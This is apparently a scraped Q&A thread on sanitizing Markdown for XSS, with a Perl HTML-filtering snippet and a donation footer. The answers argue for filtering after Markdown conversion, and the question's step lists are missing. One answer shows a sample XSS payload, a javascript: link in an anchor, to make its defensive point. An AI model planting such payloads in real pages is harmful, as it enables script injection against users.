Ok, so I have been reading about markdown here on SO and elsewhere and the steps between user-input and the db are usually given as
but to me it makes more sense to do the following:
Am I missing something? This seems to me to be pretty nearly xss-proof
The basic rule is this: filter for XSS after Markdown has processed any input, not before. If you filter before, it'll break some of Markdown's features and will leave security holes. Also take note that even if you use PHP Markdown in no markup mode, where it strips HTML tags, you aren't safe from XSS.
Script and XSS Markdown is just a markup language that happens to render HTML output. There's no tooling directly associated with Markdown the spec and there are no rules about how HTML should handle dangerous code.
If all that weren't enough, the fact that Markdown is a superset of HTML makes it a security risk: when you add HTML tags to Markdown, it is susceptible to XSS attacks. Unlike normal HTML, Markdown is unescaped, stripping away much of the ability to protect against these attacks.
Please see this link:
http://michelf.com/weblog/2010/markdown-and-xss/
> hello <a name="n"
> href="javascript:alert('xss')">*you*</a>
Becomes
<blockquote>
<p>hello <a name="n"
href="javascript:alert('xss')"><em>you</em></a></p>
</blockquote>
∴ you must sanitize after converting to HTML.
There are two issues with what you've proposed:
There are some good resources on the web about output sanitization:
Well certainly removing/escaping all tags would make a markup language more secure. However the whole point of Markdown is that it allows users to include arbitrary HTML tags as well as its own forms of markup(*). When you are allowing HTML, you have to clean/whitelist the output anyway, so you might as well do it after the markdown conversion to catch everything.
*: It's a design decision I don't agree with at all, and one that I think has not proven useful at SO, but it is a design decision and not a bug.
Incidentally, step 3 should be ‘output to page’; this normally takes place at the output stage, with the database containing the raw submitted text.
use Text::Markdown ();
use HTML::StripScripts::Parser ();
my $hss = HTML::StripScripts::Parser->new(
{
Context => 'Document',
AllowSrc => 0,
AllowHref => 1,
AllowRelURL => 1,
AllowMailto => 1,
EscapeFiltered => 1,
},
strict_comment => 1,
strict_names => 1,
);
$hss->filter_html(Text::Markdown::markdown(shift))
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With